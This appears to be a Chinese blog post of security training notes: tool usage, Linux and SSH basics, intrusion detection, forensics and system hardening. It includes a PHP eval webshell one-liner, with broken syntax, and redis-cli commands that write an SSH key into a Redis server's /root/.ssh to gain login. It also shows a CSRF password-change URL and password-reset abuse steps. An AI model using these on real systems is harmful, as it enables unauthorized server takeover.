不要把自己的努力看的太重,毕竟大家都在努力

这里写目录标题

  • 商业扫描器
  • 命令执行
    • 一句话木马
    • 超全局变量
    • 用post方法去接收pw变量
  • SQL注入
    • 分为显注和盲注
  • git安装
    • git与github
  • 查看隐藏的目录和文件夹
  • 三款系统扫描器
    • openavs
    • nessus
    • nexpose
  • 登录界面
    • 用BUrp抓登录页面包
    • 登录界面防御
    • 引申;报错信息不要过于详细
  • csrf及其总结
  • 安全工具篇
    • arp欺骗:address resolution protocol
    • ARP协议的原理过程
    • ARP缓存表
    • ARP欺骗
    • kali中有关ARP欺骗的工具
      • ettercap
      • arpspoof
  • 乌云案例:去wooyun官网可以找到很多漏洞案例
  • 安全防御篇
    • snort安装
    • snort配置
    • snort入侵检测在技术上分为两个类型
    • splunk --大数据
    • modsecurity---waf的事实上的标准并且开源
    • 查看是否有误报
    • 等级保护-客观要求和发展规律
    • 物理管理
    • 下载
    • 网络和应用
    • 三级检查
    • Linux系统安全加固
  • linux基础命令
    • 列出目录下的文件 ls
    • 查看文件 cat file
    • 查看帮助
    • 查看和结束系统进程
    • vi编辑器
    • 查看用户信息
    • 查看每一项用户信息
    • 配置权限
    • 几个符号的含义
    • find命令查找文件
    • 计划任务
    • nessus安装
    • 安装httpd
    • yum
    • debian 的套餐
    • apt-get
    • 小结
  • openssh服务
    • ssh概念(secure shell)
    • SSH可以防范的攻击类型
    • 服务的状态
    • SSH服务的基本使用
    • 将本机文件复制到远程服务器
    • 注意两点
    • 配置免密码登录
    • 在客户机使用ssh -keygen 生成公钥/私钥对
    • 小结:登录的机子可以有私钥,被登录的机子要有登录机子的公钥,这个公钥/秘钥对一般在私钥宿机产生,
    • ssh服务的日志
    • Redis未授权访问漏洞
    • 将公钥文件换行转存到另一个文件
  • nginx反向代理与php
  • docker安装使用
  • 情报侦察
    • 公开情报平台
  • 逻辑漏洞
  • kali tools合集
  • Python黑客
    • 总结思考
  • 树莓派入门
    • 树莓派基本配置
    • 更新软件源
    • 连接wifi
    • 树莓派启用BBR加速
    • 树莓派系统备份
    • 网址
  • 硬件hacking
    • 无线电波SDR(Software Defined Radio)
    • Raspberry Pi搭建ARM架构处理器,运算性能和手机相仿
  • HACK物理渗透工具及应用
  • 调查取证
    • 计算机犯罪:任何使用计算机实施犯法行为的统称
    • 传统的计算机犯罪
    • 当代计算机犯罪
    • 证据
    • 数据恢复
    • 暴力破解类
      • web登录接口的爆破
    • 扫描器类调查
    • XSS类调查
    • DDOS
  • 威胁建模
  • docke靶机教程
  • 安卓移动安全
  • 安全公司经验谈
    • 安全产品
    • 安全服务
    • 什么是信息安全
    • 误区
    • 安全工作经验
  • 互联网金融经验谈
    • 新手如何游刃有余的进行渗透测试?
  • 操作系统安全加固
    • windows加固
    • 补丁管理
    • 账号口令
    • 口令策略
    • 授权
    • 系统安全设置

商业扫描器

appscan
IBM security

命令执行

一句话木马

#@eval不要报错,会把里面字符串当做木马执行
<?php @eval($_POST['pw'];?)>

超全局变量

$_POST
$_POST[‘pw’]

用post方法去接收pw变量

get ,post
www.xxx.com/text.php?id=1

SQL注入

分为显注和盲注

UserID项输入1则返回正常,如果加一个’,则报错,盲注中不会返回数值

git安装

sudo apt -get install git
git config --global user.name "Your name"
git config --global user.email
cd /
sudo mkidir test_git
sudo git init
ls -a
sudo vim lnnan.txt
cat lnnan.txt
git status
sudo git add xiaoye.txt
sudo git commit -m "xiaoye"

git与github

github是git仓库托管的神奇网站,github和git就可以通过ssh 通信,github开源优秀渗透工具
查看公钥文件内容,复制到github上
pentestdb
下载到本地
sudo git clone 地址
因为项目pentestd依赖lxm文件

查看隐藏的目录和文件夹

ls -a
进入到目录中
cd .目录名字
查看目录下的文件
ll

三款系统扫描器

openavs

创建用户
openvasmd --create-user=farmsec
修改密码
openvasmd --user=farmsec --new-password=123456

nessus

32IP 限制,可以在本机或服务器扫描了漏洞

nexpose

32IP 限制

登录界面

DVWA,一个渗透测试靶机,需要搭建LAMP环境,然后部署DVWA

用BUrp抓登录页面包

1、没有验证码的时候可以暴力破解
2、SQL注入
3、完成密码(约等于SQL注入)
4、逻辑漏洞,任意密码重置,任意用户注册
5、四位数的短信验证码,30s内可以抓取3000个包
6、反馈过于详细

登录界面防御

1、使用https,加密post包的密码
2、使用验证码
3、错误尝试5次后,锁定账户30分钟
4、高强度密码

引申;报错信息不要过于详细

csrf及其总结

吃了我的饭就是我的人
点击链接就会修改密码。
http://192.168.0.104/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&change=change
服务器为什么不处理?
cookie,链接都是对的,服务器处理请求,认为是一个合理的操作

安全工具篇

arp欺骗:address resolution protocol

是根据IP地址获取物理地址(MAC)的一个TCP/IP 协议。
IARP:MAC–》IP

ARP协议的原理过程

主机A的Ip地址为192.168.1.1,MAC地址为OA-11-22-33-44-01
主机B的Ip地址为192.168.1.2.MAC地址是OA-11-22-33-44-02
当主机A和主机B进行通信时,地址解析协议可以将主机B的IP地址解析成主机B的MAC地址
第一步:根据主机A上的路由表内容,IP确定用于访问主机B 的转发IP地址是192.168.1.2,然后A主机在自己的本地ARP缓存中检查主机B的匹配MAC地址
第二步:如果主机A在ARP缓存中没有找到映射,它将询问192.168.1.2的硬件地址,从而将ARP请求帧广播到本地网络上的所有主机,源主机A的IP地址和MAC地址都包括在ARP请求中,本地网络上的每台主机都接受到ARP请求并且检查是否与自己的IP 地址匹配,如果主机发现请求的IP地址与自己的IP地址不匹配,它将丢弃ARP请求。
第三步:主机B确定ARP请求中IP地址与自己的IP地址匹配,则将主机A的IP地址和MAC地址映射添加在本地ARP缓存中。
第四步:主机B的将包含其MAC地址的ARP回复消息直接发送回主机A
第五步:当主机A收到从主机B发来的ARP回复消息的时候,会用主机B的IP地址和MAC地址映射更新ARP缓存,本地缓存是有生存期的,生存期结束之后,将重复上面的过程,主机B的MAC地址一旦确定,主机A就能向主机B发送IP通信了。

ARP缓存表

是用来存储IP地址和MAC地址的缓冲区,其本质就是一个IP地址–》MAC地址的对应表,表中每一个条目分别记录了网络上其他主机的IP地址和对应的MAC地址,每一个以太网或令牌环网络适配器都有自己单独的表,当地址解析协议被询问一个已知地址节点的MAC地址时,先在ARP缓存中查看,若存在,就直接返回与之对应的MAC地址,若不存在,才发送ARP请求向局域网查询。

ARP欺骗

在网络中发送虚假的ARP respones就是ARP欺骗,由于ARP协议是一种无状态协议,当收到一条ARP应答报文的时候,它就会更新ARP应答缓存表,不管它之前是否发送了ARP请求报文,ARP欺骗就是利用ARP协议的无状态性,通过捏造不存在的MAC地址更新操作系统ARP路由缓存表

kali中有关ARP欺骗的工具

ettercap

arpspoof

乌云案例:去wooyun官网可以找到很多漏洞案例

注入点
http://vip.jiayuan.com/broker/tag=1
xss盲打
nmap和masscan
nmap
网络发现和安全审计的网络安全工具
主机发现
端口发现或枚举
服务发现
检测操作系统、硬件地址以及软件版本
nmap -p 22 192.168.0.1/24
TCP 扫描
nmap -sT 192.168.0.1
nmap -sU 192.168.0.1
主机扫描
nmap -sL 192.168.0.1/24
操作系统检测
nmap -O 192.168.0.1/24
扫描所有的
nmap -A -Pn 192.168.0.1/24
nmap --help
masscan
开源无状态扫描项目,支持应用层采用了异步传输的方式,不仅仅只是测试端口是否开放,它还能在完成TCP连接的同时获取目标应用程序到的banner信息
masscan -p 80 60.195.252.0/24 >>text.txt
cat test.tx
masscan -p 80 10.0.0.0/8 --banners
对于扫描较多的的地址用masscan速度很快

安全防御篇

开源入侵检测snort

snort安装

1设置网卡
本机设置两个网卡,虚拟机四个网口
2,导入发行版securityonion
3.下一步

snort配置

根据入侵检测系统
1、基于主机
在主机上装一个插件
2、基于网络
检测网络流量

snort入侵检测在技术上分为两个类型

1.基于标志
有明显特征值
2、基于异常情况

splunk --大数据

centusos
安装

modsecurity—waf的事实上的标准并且开源

waf误报和漏报
modsecurity是一个入侵侦测和防护引擎,它主要是用于web应用程序,所以被称为 应用程序防火墙,可以作为apache web 服务器的模块或是单独的应用程序来运作
配置环境
安装包
启动apache
如果访问不了就说明起作用
1、处理误报,看日志
2、配置阀值的模式

查看是否有误报

等级保护-客观要求和发展规律

介绍和物理管理
分级,分类分阶段
分为5级
1.自主保护
2、指导
3.监督检查
4强制监督检查
5专门监督检查
定级,对国家,社会和人民的威胁程度

物理管理

是否是人为因素
对机房有二次防御,和其他报警器,防水,防火,防潮,防静电,有备用电,电磁防护,

下载

介质管理
硬盘销毁
主机和数据库测评
windows
身份鉴别,口令复杂度,定期更换,登录失败多次账户锁定,访问控制,看是否有默认共享,最小授权,
安全审计

网络和应用

网络分为网络整体和网络设备
保证网络带宽满足需要
路由控制
检查网络拓扑
访问完整
入侵检测
安全审计

三级检查

key值表明身份

Linux系统安全加固

1、ssh默认端口22
用nmap查看开启了哪些端口
vi /etc/ssh/sshd_config
看是否允许root登录
2、禁止ping
开启防火墙
查看iptables
3、使用sudo来限制用户权限
4、使用系统自带的日志
表示正确的和错误的都记录到日志
5、使用权限
6、安装denyhosts

linux基础命令

列出目录下的文件 ls

列出目录文件下的详细信息 ls -l
列出目录下所有文件的详细信息 ls -alh
更换工作目录 cd
显示当前所在目录pwd
返回上级目录 cd …
返回上一次操作的目录 cd -
返回家目录cd ~
创建新的空目录mkdir dir-name
复制文件或目录 cp -r dir destination
删除空目录 mkdir dir-name
删除目录或文件 rm dir
删除全部 rm -rf*
移动 mv dir/file destination
重命名 mv dir/file-name newdir

查看文件 cat file

看头几行 head file
看后头几行 tail file
反向查看 tac file
带行号查看 nl file
一页一页显示 more file
类似more,可以往前翻 less file
查看文件大小 du/du -h filename
减产文件所在磁盘的空间占用情况df/ df -h filename

查看帮助

命令 -h

man 命令

命令 --help

查看和结束系统进程

ps -aux |grep root
#|grep==检索
kill 进程ID /kill

vi编辑器

三种模式
touch file新建一个文件
vi file 如果文件不存在,创建并编辑
输入:I A O
退出 :ESC
保存:按shift,出现一个:,wq保存退出
cat file 查看文件

查看用户信息

cat /etc/passwd

增加组和用户/给用户指定组(组可以方便管理)
useradd username
userdel username
groupadd groupname
groupdel groupname

-l是返回详细信息
| 分割两条语句
查看组
cat /etc/group
查看组的最后修改时间
ls -al /etc/group
cat /etc/passwd| wc(用来做计算) -l(按照多少行来显示)
查看用户密码
cat /etc/shadow(显示密文)
查看指定用户密码
cat /etc/shadow |grep username
修改用户密码
passwd username
grep :检索查找
awk:文本分析工具

查看每一项用户信息

cat /etc/passwd|awk -F ‘:’ '{print $序号}'制定用:去切割
用户名 密码 UID GID 用户全名 home目录 shell 全部
1 2 3 4 5 6 7 (n)
cat /etc/passwd|awk -F ‘:’ ‘{print $1}’
只打印用户名
文件权限
4=read 2=write 1=excute

配置权限

chmod 777 file (任何人可读可写)
递归更改权限
chmod -R 777 file

几个符号的含义

.当前路径
… 上一级目录

  • 上一个工作的目录
    ~ 家目录
    ./ 执行

find命令查找文件

find 路径 内容
find -name file-name找文件
find path -user file-name 某路径下用户文件
find path -empty 查找空文件和 空目录
find /nouser 作废用户的文件
find path -perm 显示路径权限数为N的文件
find path -admin -minute 最后n分钟访问的文件

计划任务

crontab -e 进入编辑模式,设定计划任务
分 时 日 月 周 命令
30 13 * * * touch 路径/111
ctrl+X退出
crontab -l 查看任务计划

nessus安装

按tab可以自动补全
rpm
rpm -qa 查看安装过的软件包
rpm -qa|grep 安装包名 把相关的包会列举出来
rpm -q 安装包名 查询某个安装包全名(列举主包)
rpm -ql 安装包名 查看安装包在哪个目录下写入文件,不跟后缀
rpm -qlp 安装包名 查看没有安装过的包会写入那些文件
rpm -af 文件路径 查看文件是由哪个包写入的
rpm -evh 软件名 卸载软件

安装httpd

yum install httpd
启动httpd
查看状态
启动
systemctl
systemctl start启动
systemctl restart重启
systemctl stop 停止
systemctl status 查看状态
systemctl enable 开机自动启动

yum

-y 安装的时候可以做其他事情
yum -y install 软件包名 下载安装
yum -y localinstall 软件包名 安装软件
yum -y localinsatll *.rpm 本地批量安装
yum update 全部更新
yum update 包名 更新某个包
yum check-update 检查可更新的包
yum grouplist 列举系统中以组安装的包
yum remove 软件包名 卸载软件
yum groupremove 组名 删除程序包
yum deplist 包名 查看依赖关系
yum clean all 清楚全部缓存
yum makecache 更新源
yum list|grep 包名 查看有没有对应的包

debian 的套餐

dpkg -i 包名 安装软件
dpkg -L 软件全名 软件安装到什么地方
dpkg -l 软件全名 该安装包的版本
dpkg -r 软件名 删除软件但保留配置文件
dpkg -P 软件名 删除软件但清空配置文件
dpkg -s 软件全名 查看软件的详细信息
dpkg -c 安装包 查看安装该软件会在哪写入数据

apt-get

apt-get update 更新源
apt-get upgrade 更新系统
apt-get install 包名 安装软件
apt-get remove 包名 删除软件
apt-cache search 某个关键字 搜索需要的软件包含在哪个包里
apt-get clean 清空缓存包
clear 清空屏幕

小结

查看安装过的包 rpm -qa
查询某个安装包 rpm -q
安装包在哪个目录下写入文件 rpm -ql
查看没有安装过的包会写入那些文件 rpm -qlp dpkg -c
查看文件是由哪个包写入的 rpm -af
卸载软件 rpm -ech
下载安装 yum install apt-get install
更新包 yum update
检查可更新的包 yum check-update
卸载软件 yum remove apt-get remove
更新源 yum makecache apt-get update

cat 文件名|grep 要检索的字 检索关键字

cat 文件名|grep -v 要去除的字 检索去除了字的文本
cat 文件名|sort 文本排序 数字按照123,字母按照abc
cat 文件名|uniq 文本去重
cat 文件名 wc -l计算行数
旧的文本>>新的文本 文本重定向
diff 文本1 文本2 比较文本的差异
split -l 要分割成多少的个数 被分割的文本名字

openssh服务

ssh概念(secure shell)

通过使用ssh,可以把传输的数据进行加密,这样中间人的攻击方式就不可能实现了,而且也能够防止DNS欺骗和IP欺骗
使用SSH,传输的数据都是经过压缩的,所以可以加快传输的速度
SSH 由很多功能,它既可以代替Telnet,又可以为FTP,Pop,也可以为PPP提供一个安全的通道
备注:Telnet是明文传输,而ssh是加密传输

SSH可以防范的攻击类型

数据包欺骗
IP或主机欺骗
口令截获
网络嗅探
插入攻击
openssh的安装与状态(启动/停止)
oepnssh默认安装在centOs中,相关安装包可以通过下面命令进行查询
yum list|grep oepnssh

服务的状态

systemctl status/start/stop sshd.service
如果服务关闭,则会导致无法远程开启服务

SSH服务的基本使用

远程连接服务器
ssh 192.168.0.200
备注:默认情况下,会使用本地的用户名连接对方的用户名,例如本地的root连接对面服务的root,如果两端用户名不一样,则需要使用-l username 指定用户名,输入正确密码后方可登录,同时变化的文件是/root/.ssh/known_hosts
在第一次登录的时候,oepnssh将会提示不知道这台登录的主机,只要输入YES,就会把这台主机的识别信息添加到known_hosts文件中,第二次登录的时候,则无需此步骤,但是如果出现错误,例如主机发生变化,则需要删除此内容,

将本机文件复制到远程服务器

scp 本地文件 username@host:服务器目录
将远程服务器上的文件复制到本机
scp username@host:文件名 本地目录

注意两点

1、如果远程服务器防火墙由特殊限制,scp便要走特殊端口,具体用什么端口视情况而定,命令如下
scp -p 4588 username@host:/farmsec.text /home/
2、使用scp要注意所使用的用户是否具有可读取远程服务器相应文件的权限
SSH server的常规配置
ssh 的配置文件是/etc/ssh/sshd_config
修改SSH端口并配置root 无法登录
使用vi 打开配置文件,将port 22进行注释取消掉,并改为2222
设置好后,保存并退出,并重启SSH服务
这之后使用ssh连接服务器就需要使用2222端口,使用22端口就无法连接

配置免密码登录

SSH无密码登录需要使用公钥与私钥
客户机(192.168.0.115)服务器(192.168.0.200)
编辑服务器配置文件,开启私钥验证
取消掉配置文件中的注释
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedkeysFile .ssh/authorized_keys
随后重启服务
systemctl restart sshd
exit退出

在客户机使用ssh -keygen 生成公钥/私钥对

cd .ssh
将秘钥文件拷贝至服务器,使用命令
ssh-copy-id username@host
随后客户机访问服务器,我们会发现直接无密码登录
而后我们修改配置文件,重新禁用root用户登录,则效果如下:
而如果我们使用另外一台主机登录,我们会发现可以通过密码的方式登录
我们可以修改配置文件中的passwordAuthentication no,可以禁止使用密码的方式

小结:登录的机子可以有私钥,被登录的机子要有登录机子的公钥,这个公钥/秘钥对一般在私钥宿机产生,

上面是用rsa算法的公钥/秘钥对,当然也可以用dsa,(对应的文件是id_dsa,id_dsa.pub)

ssh服务的日志

日志文件为/var/log/secure
可以使用如下命令进行监控
tail -f /var/log/secure用于查看正在改变的日志
大家可以自由定制所想查看的日志,例如模拟登录失败观察日志的情况

Redis未授权访问漏洞

漏洞简要说明与复现
Redis默认情况下,会绑定在0.0.0.0:6379,这样将会将Redis服务暴露在公网上
如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据
攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的/root/ssh文件夹的authotrized_keys文件中,进而可以直接登录目标服务器
docker的端口 2222 用20的端口是无法登录进去的

将公钥文件换行转存到另一个文件

(echo -e“\n\n”;cat id_rsd.pub;echo -e“\n\n”)>1.txt
cat 1.txt |redis-cli -h 192.168.0.200 -p 6379 -x set key
OK
redis-cli -h 192.168.0.200
ping
config get*
更改备份文件保存的目录
config set dir /root/.ssh
设置保存的文件名
config set dbfilename “authorized_keys”
save
连接靶机端口2222
ssh 192.168.0.200 -p 2222

nginx反向代理与php

nginx 是一个高性能的http 和反向代理服务器,占用内存小并发能力强
1、启动epel
yum list|grep epel
epel-release.noarch
yum -y install epel.release
2、安装nginx
yum -y install nginx
3、启动nginx
systemctl start nginx.service
打开浏览器输入地址
cd /etc/nginx
ls
vi nginx.conf
配置lnmp网站

docker安装使用

可以在VM,bare metal,openstack集群和其他的平台批量部署环境
优点
1、轻量型
2、docker的scale out是物理机和虚拟机不具备的,而且container相对于物理机和虚拟机管理更方便
3、封装细节,可以快速见到产品效果
4、多系统支持,开源

情报侦察

公开情报收集,为后续的渗透测试做准备
whois,真实ip,子域,端口,服务,关联度高的目标,备案,企业资料,历史漏洞,员工邮箱,

公开情报平台

逻辑漏洞

无法进行广泛研究,每一个逻辑漏洞都是唯一的
任意用户密码重置
1、使用自己的手机号接受验证码
攻击思路;首先来到忘记密码处,使用自己的手机号接受验证码,接受到验证码之后,再把受害人的手机号替换上,
2、把手机号修改为受害人的手机号,填入自己手机收到的验证码,单击下一步
3、进入修改密码,修改密码为123456qq

kali tools合集

Python黑客

python 编写字典攻击脚本
思路:加载字典,利用reques.get/post,探测返回状态(status_code&content)进而判断是否攻击成功
python简单识别验证码
pytesseract 依赖于tesseract-ocr
python编写狗fuzz脚本
加载各种需要尝试的payload,requests.get/post,探测返回情况是佛福已经过狗
Python实现简单的网络嗅探
scapy是一个可用于网络嗅探的非常强大的第三方库,
实现一个简单的网络嗅探程序检测smurf攻击
Python数据分析
numpy,pandas,matplotlib

总结思考

基于规则的waf/ida/ips的局限性
趋势-机器学习建立防御模型
如何用python进行渗透测试

树莓派入门

树莓派基本配置

默认用户名:pi 密码:respberry
启动root账户
sudo passwd root
输入两遍密码,如果提示password:password updated successfully则表示成功更改root密码,然后执行:
sudo passwd --unlock root
su并输入密码即可使用root用户
修改ssh配置启动root登录
sudo nano /etc/ssh/sshd_config
找PermitRootLogin without-password
改为PermitRootLogin yes
重启服务
sevice ssh restart

更新软件源

编辑/etc/apt/sources.list添加下面两行保存
deb http://mirrors.tuna.tsiinghua.edu.cn/raspbian/jessie main nonfree contrib
deb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/jessie main nonfree contrib
注释掉/etc/apt/sources.list.d/raspi.list里的内容
sudo apt update 更新源
sudo apt upgrade 更新软件包

连接wifi

树莓派三代,自带蓝牙和无线所以直接编辑wifi配置文件即可
编辑/etc/wpa_supplicant/wpa_supplicant.conf,添加
network={
ssid=“WIFI name”
psk=“wifi 密码”
}
保存即可
添加完之后重启网络来连接wifi
/etc/init.d/networking restart
固件更新
sudo rpi-update
如果提示找不到命令,需要安装rpi-update
sudo apt-get install rpi-update
OK ,等待固件更新完成,然后重启

修改/etc/dhcpcd.conf文件
sudo nano /etc/dhcpcd.conf
interface eth0
static ip_address=192.168.0.1
static domain_name_servers=192.168.0.1
interface wlan0
static_ip_address=192.168.0.200/24
static_routers=192.168.0.1
static_domain_name_servers=192.168.0.1
上面的配置文件中,eth0是有线配置,wlan0是无线配置
ip_address就是静态IP,后面要接/24
routers是网关
static domain_name_servers是DNS

树莓派启用BBR加速

Linux 4.9内核版本正式启用了这个功能
apt install screenfetch
用screenfetch工具查看内核版本是否升级成功
启用bbr
sudo sysctl net.ipv4.tcp_congestion_control=bbr
查看bbr是否加载
lsmod |grep bbr

树莓派系统备份

备份SD卡
使用dd命令可以直接备份SD卡,这里树莓派的SD卡的路径是dev/sdc1和dev/sdc2,所以备份整个SD卡的路径就是/dev/sdc
sudo dd if=/dev/sdb|gzip>/home/netsfe/rasp/raspberry.gz
其中备份文件要保存的位置,文件名和SD卡的路径根据实际选择
将树莓派镜像还原
在Windows环境下,将备份文件解压,然后使用win32diskmager将备份文件写入到新的SD卡
树莓派项目推荐

网址

linux 手册在线查询
https://jaywcjlove.github.io/linux-command/

硬件hacking

无线电波SDR(Software Defined Radio)

是一种无线电通信技术,它基于软件定义的无线通信协议而非通过硬连线实现,频带,空中接口协议和功能可以通过软件下载和更新来实现软件升级,而不用完全更换硬件。
1、无线电可以毁灭互联网安全,信号干扰器及犯罪
2、监听GSM流量,GPS欺骗
3、收音机,电报台,发报台
4、WIFI嗅探

Raspberry Pi搭建ARM架构处理器,运算性能和手机相仿

HACK物理渗透工具及应用

调查取证

计算机犯罪:任何使用计算机实施犯法行为的统称

计算机相关犯罪:计算机外围参与的违法行为,例如传统的外围下注和盗窃
数字犯罪:表示未授权的访问,分发,操作,破坏,或崩溃电子存储数据的任何行为的术语
网络犯罪:通过因特网实施和推动的犯罪行为

传统的计算机犯罪

盗窃元器件
盗打电话
盗版光碟

当代计算机犯罪

DDOS
蠕虫病毒
垃圾邮件
商业间谍
违禁品或非法材料的传播
伪基站
网络欺诈
恐怖主义

证据

直接证据
情况证据
传闻证据
电子证据
网络证据
线缆:屏蔽线和非屏蔽线
交换机:ARP的记录
路由器/防火墙:路由表
DHCP/DNS/raduis:访问的记录
IDS/IPS:直接定位疑似的攻击源
web服务器的日志:记录
日志服务器:整体的集合,持久保存

数据恢复

EasyRecovery
finaldata

暴力破解类

ssh服务
tail -f /var/log/secure

web登录接口的爆破

在web层面进行撞库,被发现的难度远远大于系统的层面
主要原因在于:web提供的日志不记录post请求的数据,现实情况中可能存在很多人通过NAT上网导致查到的IP相同
我们可以通过snort编写规则进行查找

扫描器类调查

Modsecurity的规则中存在针对扫描器特定的UserAgent的检测文件
通过Snort编写规则进行疑似的威胁查找,例如有人访问/admin.php
通过Web日志的顺序判断对方可能使用的扫描器

例如凌晨三点我们收到警报短信,我们起床后可以通过简单的查询日志可以判断对方的水平及被攻击成功率,
多个维度查看,例如扫描的链接顺序,payload(传输的实际数据)的类型,特定的useragent
试验:开启所有的扫描器针对特定页面进行攻击测试,同时观看日志分析扫描器的一些套路

XSS类调查

403状态不用管
存储型XSS数据库中会有数据库
如果后台弹窗,可能会有盲打漏洞
反射性XSS需要观察日志,进行相应的替换测试(将js替换成弹窗)

DDOS

系统CPU内存利用率
NTOP流量监测
快速切换抗D方案
后门调查
LInux木马经常被放置于/tmp目录
netstat -an
ps -aux
netstat -tlnp
查找可疑似的进程及文件

威胁建模

docke靶机教程

安卓移动安全

二进制初级

安全公司经验谈

甲方:提出目标的一方
乙方:完成目标的乙方

安全产品

产品实施工程师,技术支持工程师

安全服务

渗透测试工程师、安全服务工程师、应急响应工程师
售前:售前工程师、安全顾问
Web+安卓+微信公众号+PC端测试
销售经理,大客户经理

什么是信息安全

确保组织业务能够持续,稳定运行

误区

信息安全=网络安全
信息安全=防止信息泄露
信息安全=防黑客攻击
信息安全=找茬
信息安全=一次性
信息安全=技术可以完全解决

安全工作经验

1、渗透测试中没有找到测试漏洞该怎么办?
httponly,点击劫持
2、挖到漏洞不是关键,注意报告输出质量
(怼开发,怼运维)
(目录,测试目标,对象,测试方法介绍)
(测试结果,漏洞细节描述,整改建议)
3、站在对方的立场上考虑问题
(漏洞整改要结合业务情况,不能为了安全而做安全)

互联网金融经验谈

新手如何游刃有余的进行渗透测试?

1、网络逻辑漏洞,只需要分析用户需求
2、OWASP10漏洞
SQL 注入漏洞
XSS跨站漏洞
CSRF伪造漏洞
3、APP应用漏洞
代码混淆漏洞
DEX保护漏洞
so保护漏洞
调试测试漏洞
组件安全漏洞据安全漏洞
业务逻辑漏洞
4、日志安全审计

操作系统安全加固

windows加固

系统信息
查看系统版本ver
查看SP版本wmic os get ServicePackMajorVersion
查看Hotfix wmic qfe get hotfixid
查看主机名 hostname
查看网络配置 ipconfig/all
查看路由表 route print
查看开放端口 netset -ano

补丁管理

补丁安装
操作目的 安装系统补丁,修复漏洞
检查方法 使用nessus扫描漏洞,或安装微软安全基准分析器Microsoft Baseline Security Analyzer 扫描漏洞
加固方法 内网主机手动安装补丁或在内网搭建WSUS服务器,外网主机设置自动更新从微软官网软件下载补丁安装
回退方案 打补丁前做好业务或者系统备份,回退时恢复备份
如果是手工安装补丁,在安装前了解补丁是否影响业务,回退时在添加删除程序中删除相关补丁
备注 补丁安装后可能影响业务的稳定性

账号口令

操作目的 减少系统无用账号,降低风险
检查方法 开始-》运行-》compmgmt.msc(计算机管理)-》本地用户和组,查看是否有不用的账号,系统账号所属组是否正确以及guest账号是否锁定
加固方法 使用net user 用户名/del 命令删除账号,使用net user 用户名/active:no 命令锁定账号
回退方法 使用net user 用户名 密码/add 命令添加账号 使用 net user 用户名/active:yes 命令激活账号

口令策略

操作目的 增强口令的复杂度以及锁定策略等,降低被暴力破解的可能性
检查方法 开始-》运行-》secpol.msc(本地安全策略)–》安全设置
加固方法 账户设置 密码策略
账号密码必须符合复杂性要求-》启用
密码长度最小值:8个字符
密码最短使用期限:0天
密码最长使用期限:90天
强制密码历史:5个记住密码

授权

远程关机
操作目的 只允许管理员组远程关机,降低风险
检查方法开始-》运行-》secpol.msc(本地安全策略)-》安全设置,在本地策略->用户权限分配 查看从远程系统强制关机设置是否只指派给Administrtors组
加固方法 开始-》运行-》secpol.msc(本地安全策略)-》安全设置,在本地策略->用户权限分配 查看关闭系统只指派给Administrtors组
本地关机
操作目的 只允许管理员组本地关机,降低风险
运行-》secpol.msc(本地安全策略)-》安全设置,在本地策略->用户权限分配 查看关闭系统只指派给Administrtors组
用户权限分配
操作目的 只允许管理员组拥有取得文件或其他对象所有权的权限,降低风险
授权用户登录
操作目的
允许授权的账号本地系统登录,减低风险

授权用户从网络访问
操作目的 允许授权账号从网络系统登录系统,降低风险

系统安全设置

屏幕保护
操作目的 设置屏保,使本地攻击者无法直接恢复桌面控制
控制面板-》显示-》屏幕保护程序,设置等待时间为10分钟

远程连接挂起
操作目的 设置远程连接挂起时间,使远程攻击者无法直接恢复桌面控制

禁止系统自动登录
操作目的 系统休眠后重新激活,需要密码才能使用系统

隐藏最后登录名
注销后再次登录,不显示上次登录的用户名

关闭windows自动播放功能

网络服务

优化服务
关闭不需要的服务,减小风险
开始-》运行->service.msc
建议将以下服务停止,并将启动方式改为手动
Automatic Updates(不使用自动更新可以关闭)
Background Intelligent Transfer Service
DHCP Client
Messager

关闭共享
关闭默认共享

网络限制
网络访问限制

文件系统
使用NTFS
增强文件系统安全性

检查Everyone权限
增强Everyone权限
sql视频通关教程

限制命令权限
限制部分命令的权限

日志审核
增强日志
增大日志量大小,避免由于日志文件容量过小导致日志记录不全
增强审核
对系统事件进行审核,在日后出现故障进行排查

去哪搜集恶意样本?
分析DNS工具
安全运营数字化

sqli-lab攻略

大数据安全和网络安全基础知识相关推荐

  1. 网络安全基础知识学习之Web安全百问百答

    网络安全基础知识学习之Web安全百问百答 1.什么叫Web应用系统? 答:Web应用系统就是利用各种动态Web技术开发的,基于B/S(浏览器/服务器)模式的事务处理系统.用户直接面对的是客户端浏览器, ...

  2. 【学习笔记】网络安全基础知识总结

    网络安全基础知识总结 前言 一.网络安全概述 1.1 引言 1.2 密码学的发展 1.3 密码学基础 1.4 对称密码 1.4.1 数据加密标准DES 二.数论知识 2.1 数论基础 2.2 有限域 ...

  3. 网络安全基础知识入门!网络安全学习教程

    当我们学习网络安全的时候,需要对它的基础知识做一个简单的了解,这样对以后的学习和工作都会有很大的帮助.本篇文章为大家总结了网络安全基础知识入门的内容,快跟着小编来学习吧. 计算机网络 计算机网络是利用 ...

  4. 网络安全不可小觑,这些网络安全基础知识要牢记!

    网络安全不可小觑,这些网络安全基础知识要牢记! 一.引论 提到网络安全,一般人们将它看作是信息安全的一个分支,信息安全是更加广义的一个概念:防止对知识.事实.数据或能力非授权使用.误用.篡改或拒绝使用 ...

  5. 小白入门!网络安全基础知识详解(附知识问答)

    小白入门!网络安全基础知识详解(附知识问答) 一.引论 提到网络安全,一般人们将它看作是信息安全的一个分支,信息安全是更加广义的一个概念:防止对知识.事实.数据或能力非授权使用.误用.篡改或拒绝使用所 ...

  6. 【人工智能】大模型之编码器基础知识

    [人工智能]大模型之编码器基础知识 文章目录 [人工智能]大模型之编码器基础知识 1. 引言 2. 技术原理及概念 2.1 基本概念解释 2.2 技术原理介绍 一.自注意力机制 二.编码器的基本工作流 ...

  7. 计算机网络安全基础知识笔记

     1.网络安全威胁介绍 非法授权访问:没有预先经过同意,就使用网络或相关的计算机资源就是非授权访问.主要有以下几种形式:身份攻击.假冒.非法用户进入网络系统进行违法操作.合法用户以未授权的方式进行操作 ...

  8. 【大数据】服务器硬盘基础知识

    大数据_02[大数据基础知识] 01 什么是服务器 02 服务器类型 03 存储磁盘(硬盘) 服务器: 也称伺服器,是一种高性能计算机,提供计算服务的设备. 服务器的构成包括处理器.硬盘.内存.系统总 ...

  9. 弱电人要学习的网络安全基础知识

